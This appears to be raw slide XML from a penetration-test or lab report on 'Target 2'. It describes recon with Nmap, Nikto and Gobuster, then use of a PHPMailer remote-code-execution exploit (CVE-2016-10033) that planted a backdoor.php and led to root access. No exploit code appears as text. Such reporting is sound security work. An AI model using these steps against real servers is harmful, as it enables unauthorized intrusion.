            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With this we were able to gain root access, and now had full control of the server:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2430" name="Google Shape;2430;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6259823" y="4064231"/>
            <a:ext cx="11858003" cy="2793769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2431" name="Google Shape;2431;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5919226" y="8153754"/>
            <a:ext cx="12539065" cy="1096933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2432" name="Google Shape;2432;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="5581" r="33191" b="89124"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5919226" y="9245237"/>
            <a:ext cx="7435827" cy="4668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14"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Critical Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Target 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2438" name="Google Shape;2438;p1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14</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2439" name="Google Shape;2439;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>In addition to Target 1’s vulnerabilities, we uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1"/>
              <a:t>Target 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2440" name="Google Shape;2440;p14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176987" y="5778784"/>
          <a:ext cx="21995600" cy="3407550"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{AB76892F-4A5C-4B29-B97E-A2BCD0243B9D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5540350">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="10480425">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5974825">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1135850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425" anchor="b"/>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b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425" anchor="b"/>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b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425" anchor="b"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1135850">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dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>2016-10033</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none" dirty="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Remote Code Execution</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solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>High</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>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135850">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CWE - 77</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none">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Command Injection</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none">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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>High</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2445" name="Google Shape;2445;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731334" y="773067"/>
            <a:ext cx="22914824" cy="12246448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2446" name="Google Shape;2446;p1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t>15</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2447" name="Google Shape;2447;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="4936267"/>
            <a:ext cx="22914900" cy="2745600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750"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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits Used:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2448" name="Google Shape;2448;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-87421" y="34962844"/>
            <a:ext cx="56659498" cy="1612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16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108452" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2454" name="Google Shape;2454;p1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16</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2455" name="Google Shape;2455;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="98667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Passive recon again performed by browsing user-facing website.</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For active recon we employed multiple tools such as Nmap for a service and version scan, along with the operating system running on the machine:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2456" name="Google Shape;2456;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441075" y="4914900"/>
            <a:ext cx="15495500" cy="8004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gf9c6693cea_2_1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108500" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2462" name="Google Shape;2462;gf9c6693cea_2_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17</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2463" name="Google Shape;2463;gf9c6693cea_2_1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nikto was used to create a list of URLs that Target 2 HTTP server exposed:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2464" name="Google Shape;2464;gf9c6693cea_2_1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="221825" y="3129925"/>
            <a:ext cx="23934001" cy="5484872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2465" name="Google Shape;2465;gf9c6693cea_2_1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="221825" y="8614800"/>
            <a:ext cx="23934001" cy="27590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gf9c6693cea_2_9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108500" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2471" name="Google Shape;2471;gf9c6693cea_2_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18</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2472" name="Google Shape;2472;gf9c6693cea_2_9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575875" y="2396638"/>
            <a:ext cx="22942800" cy="98667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An even more in-depth enumeration using Gobuster revealed the presence of the vulnerable WordPress website:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2473" name="Google Shape;2473;gf9c6693cea_2_9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065750" y="4086450"/>
            <a:ext cx="22246150" cy="88675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gf9c6693cea_2_25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108500" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2479" name="Google Shape;2479;gf9c6693cea_2_2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19</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2480" name="Google Shape;2480;gf9c6693cea_2_25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="98667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Searchsploit proved valuable by showing exploit modules for PHPMailer, specifically Remote Code Execution (PHP) for versions earlier than 5.2.18:</a:t>
            </a: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This allowed us to use an exploit shell which created a backdoor.php, able to execute commands via HTTP.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2481" name="Google Shape;2481;gf9c6693cea_2_25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
